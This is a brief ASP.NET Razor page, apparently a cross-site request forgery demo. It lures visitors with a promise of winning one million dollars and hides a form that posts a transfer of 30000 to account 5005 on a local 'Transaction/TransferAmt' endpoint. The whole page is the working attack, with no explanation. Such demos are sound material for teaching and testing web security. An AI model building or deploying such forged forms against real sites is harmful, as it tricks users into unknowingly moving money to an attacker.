@{
    ViewBag.Title = "Home Page";
}

<div>
    Win 1000000 US$ by playing ultimate game
    <form action="http://localhost:57342/Transaction/TransferAmt" method=post> 
    <input type=hidden name="amount" value="30000" /> <input type=hidden name="account" value="5005" /> 
    <input type=submit value="Play the ultimate game" /> </form>
</div> 